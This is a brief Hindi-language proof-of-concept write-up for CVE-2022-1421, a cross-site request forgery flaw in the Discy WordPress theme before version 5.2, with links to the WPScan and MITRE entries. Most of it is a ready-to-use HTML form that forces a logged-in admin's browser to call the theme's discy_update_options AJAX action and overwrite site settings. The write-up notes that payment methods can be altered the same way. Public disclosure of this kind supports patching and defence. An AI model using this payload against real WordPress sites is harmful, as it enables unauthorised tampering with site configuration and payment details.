
CVE-2022-1421 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Discy WordPress थीम में एक CSRF कमजोरी, जो क्राफ्टेड AJAX अनुरोधों के माध्यम से एडमिन सेटिंग्स में बदलाव की अनुमति देती है।
CVE-2022-1421 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट
Discy < 5.2 में कुछ AJAX कार्रवाइयों में CSRF जाँचों का अभाव है, जिससे एक हमलावर लॉग इन किए हुए एडमिन से CSRF हमले के माध्यम से प्लगइन की मनमानी सेटिंग्स (भुगतान विधियों सहित) बदलने में सक्षम हो सकता है।
Discy < 5.2
<html>
<body>
<form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="discy_update_options">
<input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
<input type="submit" value="Submit request">
</form>
</body>
</html>
https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421